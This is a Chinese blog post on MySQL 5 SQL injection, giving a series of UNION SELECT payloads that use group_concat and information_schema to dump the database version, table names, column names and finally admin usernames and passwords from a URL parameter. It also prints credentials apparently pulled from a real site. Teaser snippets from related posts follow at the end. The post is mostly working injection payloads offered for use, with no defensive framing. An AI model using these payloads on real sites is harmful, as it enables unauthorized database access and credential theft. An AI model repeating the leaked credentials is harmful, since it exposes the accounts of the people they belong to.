mysql 5 5 注入 mysql5注入

2021-10-19 01:46:12 字數 1457 閱讀 7046

對mysql5注入時,可以直接查詢information_schema中的tables表,快速找到所需的表段。同時可以利用group_concat函式,得到你想得到的東西,不用limit乙個乙個猜。

前面先轉轉別人的東西

and/**/1=2/**/union/**/select/**/1,2,group_concat(user(),0x7c7c,version(),0x7c7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18―

一次暴完表名,版本,資料庫名

and/**/1=2/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/information_schema.tables/**/where/**/table_schema=database()--

暴當前庫所有表名

一般來說如里表太多,不能一次暴完,就要加limit語句了,10個10個來

and/**/1=2/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/(select * from information_schema.tables where table_schema=database()  limit 0,10) as test --

and/**/1=2/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/information_schema.columns/**/where/**/table_name=(表的hex值)--

暴表所有列

個人以為,其實如果只要找後台密碼,暴所有表名純是多餘。oracle注入是,可以快速定位pass欄位在那個表中,mysql5也是可以的。

and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_schema =database() and column_name like 0x257061737325(%pass%的hex值)--

直接暴出包含有pass欄位的表名,然後再爆此表的所有列名。

id=106522%20and%201=2%20union%20select%201,2,group_concat(admin_id,0x7c7c,admin_pass),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18 from admin--

暴出所有使用者名稱和密碼,如下:

admin||adminweb,jung||jung1979

mysql5無法注入 mysql5注入

對mysql5注入時,可以直接查詢information schema中的tables表,快速找到所需的表段。同時可以利用group concat函式,得到你想得到的東西,不用limit乙個乙個猜。前面先轉轉別人的東西 and 1 2 union select 1,2,group concat us...

mysql 5 5傳馬 mysql5 5安裝文件

groupadd mysql useradd r g mysql mysql mkdir home mysql mkdir p data mysql chown mysql mysql r data mysql yum install y gcc gcc c libtool autoconf aut...

mysql 5注入中group concat的使用

mysql中的information schema 結構用來儲存資料庫系統資訊 information schema 結構中這幾個表儲存的資訊,在注射中可以用到的幾個表。schemata 儲存資料庫名的,關鍵字段 schema name,表示資料庫名稱 tables 儲存表名的 關鍵字段 table...